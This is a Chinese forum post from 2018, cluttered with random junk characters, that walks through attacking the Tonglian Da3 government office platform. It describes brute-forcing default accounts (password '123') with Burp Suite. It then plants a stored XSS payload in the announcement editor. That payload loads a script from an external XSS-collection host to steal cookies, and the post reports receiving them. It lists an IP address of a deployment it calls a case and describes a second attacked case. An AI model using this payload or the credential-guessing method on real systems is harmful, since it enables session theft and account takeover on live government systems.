, X% ~4 M( z; G5 `! O- v: q0 Z1 W2 o ; \: A' C! h3 ^ G6 h; ~9 v$ L8 c
同联Da3协同办公平台后台通用储存型xss漏洞
% U; O, q5 Y, s! b) O2 E& p9 h
4 u7 ]: p$ z- }$ ?; Z9 | / b5 N& f3 x4 B% F; g6 z7 d* K
平台简介:, Y1 h: B: k, t9 g9 @7 q$ r
; o8 U3 `! Z4 }3 }! A/ k
: @9 ~7 Y3 ], }0 x 4 [4 e" H( ]4 T p) \: D
; k3 |' T$ p" d
& E3 h4 p4 G. r& A! f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. J+ Q/ c: }+ F7 N$ O- R$ W- U
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! z! ^0 w3 a5 ^& z, B% ~同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 |1 S$ c3 _% ]0 Y
! i& s5 ?: ^6 ~* T$ s
5 F* D W" m1 A4 A0 u! k
$ y0 h6 I# O) a3 |+ ^
|% G8 K8 }# L% d - {% O2 \0 P( C2 `! X
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
) b. I9 X8 O6 R; }9 `6 z
( C, b0 [5 Y2 l8 B
4 q1 z7 I1 I+ R6 o$ ^; Y ) U, E7 b6 Q: o1 ^! S
( z- {. K1 H, R' m
- ^5 } i: R9 N6 t. V http://1.1.1.1:7197/cap-aco/#(案例2-)) ]' }: p) V; i8 ~# y$ \
1 q/ l# p+ X; _9 \4 r
# f/ N9 x$ F' j! s' D( p
http://www.XXOO.com (案例1-官网网站)
; [- @' t4 i3 h
. m0 j+ K4 X9 N9 J1 i9 s, p
( ^0 c. p, A+ ?6 `1 p- Z4 z) I' l 漏洞详情:
( E( ^3 W# P- Y) ^- `* u6 P
1 P" X: x# L4 g! X" {5 y
: u3 T: I& l# S' |- Q6 F9 r! [ 案例一、
6 E1 C/ c. Y* J% B
3 Z9 h+ o5 Q3 @6 K0 @
5 {. M5 d" V$ d* {( Z- ? 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试+ e E E3 d+ R2 M
3 K$ w* a0 @) a- P1 U
: I( {6 }% O' F1 N 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
8 j1 \/ m% x) n% B
- e, ~, q7 {/ m; ?% ]
' W+ y% d: P2 P* P- M1 ]
6 f2 U) v. H4 ]$ Z; C
- D& e7 X! W. f& t! d T
H) A! G' Q: I
+ ~' Q O+ Z% f, g1 a
$ ^. `4 ~1 Q- D4 ~" ]* [ X4 z2 r
5 Y5 {0 |+ R5 W- j status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
0 S0 B3 v% g5 E/ ^% _1 c6 b
5 I, i; u4 V/ u! e2 `
& {& J9 k/ K2 [8 h1 }0 Q
8 U0 a" }1 i) @9 z' ]
% B! |/ ^6 M3 h. b+ b3 P
9 k3 d" ^* g$ x8 V 
5 O0 L" ]( g: S; E$ @' G" X$ V b& w$ r
n. y5 C1 y7 C; w |+ F- \; b $ w" }6 _) }' @' [" X" N' G. O( i
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
0 `) z, J* [5 J) l) G* B6 L/ I. I
9 I P5 z- B0 S/ \+ n
! a' j" m5 I" g5 W: S9 A 7 p# p1 C% U9 o
0 G- _: q. ]4 F0 }1 s' S' s2 C6 z
3 e4 {. O# ?5 i2 d( d% Z <img src=x3 f$ o3 F4 B$ ~6 A& X, C
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 0 B6 O; h- J* {, j0 H d( i
: G, {! e( _ b( [# G+ ]1 h3 C" ~( @
/ r0 Y9 |* y' p$ r& v* f8 l 
$ k3 D! ~ I5 ~2 m: ?
: r% l2 `4 c- e" A# W
+ c! u1 I( ? ]6 v# c
然后发送,接收cookie如图: 6 M5 U0 g) R. o# i# Z5 M( u' Y* g8 x
/ f( g7 ~: _- M4 G 0 e; A, [/ i0 a& T
# _2 \% _% ~. `* Q& w
- L( }8 l1 ^# n" S
. d, c* I c" c3 v2 z
/ e- v1 t: n# V' J7 U$ e
k% Y9 J& B- p- i4 A
' Q, `( [; M" h; U ~ ! H* B1 [( c" ^8 g
8 c9 `/ R, T0 \' B
& k S9 }, }8 J b6 _- R# c6 f7 x7 G* l/ b
- L# I' \% \1 d# D3 P1 J, s
% A/ n: g; R6 ^1 p: V 
5 ]! _' b* c! a) u/ C; F
& c& n1 p; F u, s# o# c
3 A4 |5 @1 X& @. S* R 
5 Z# n% u% o! }: r1 n& p6 ?
& F( N6 P3 A# {/ o, e1 c
' K8 k4 [0 I+ Z1 Y3 G! p G # K/ }; i9 v# j @- n4 e
) P8 ~3 F6 i7 X3 g: Q- s1 ^8 ?
3 N) k+ I2 o' { 案例2、
N2 O( h: _! G6 a2 V% U' |
( o" ^, E. X1 R* E7 p
8 c, n1 W0 e, B3 |0 Q 前面步骤都一样,下面看效果图:
9 s0 S4 n( h( T3 n! C) B5 G
/ b' {/ q9 i3 ?$ q
9 m0 @, Y& ^' A. `. y 
% v+ \6 N# a3 z; s' y3 t
* I# o* J' b* f* X% b# O/ d; O0 M
; A- Q ^. G7 o; X2 S1 a& v- A 
: V5 P& F' l7 z5 Y8 J+ R: b
1 L0 a% J q8 O; K0 U: h" N& o+ @
$ ]2 F2 P* O. v7 @
1 K9 P9 Y# {& H
7 r, b; y8 ^/ E( Y C- n' ~
% Y9 m6 G! f0 V6 o
" v+ I# p+ Y H# Q& u
( Q; s6 o$ S* r" X& a
6 y3 s! s& x' B* t x q 
: `6 A: ?, M, T5 [7 H& O! K. T, n* c' K
; ^: L; N0 w+ I% z$ d, r4 j
q) u' R3 E, `# `
8 [) L+ g% Y6 y& N8 b+ u) N
4 l$ g' K k5 U) u $ f2 X( X+ l# q2 x
' u4 m7 |/ K4 Y/ R" L# N. C
* X ]" M8 x7 Q k6 ~ e {. C2 h& w
8 T/ R7 W. n1 u4 R6 E
. j: ^: C; n! f* r( s4 f3 y$ Z; Y
* L5 K3 ^1 a& s" X: d h: w ' M; Q! Y B2 c5 T. c- i- w
$ i2 l: ]. r2 f
' B9 {( \& E. N7 k
发表于 2018-10-20 20:14:15
收藏
支持
反对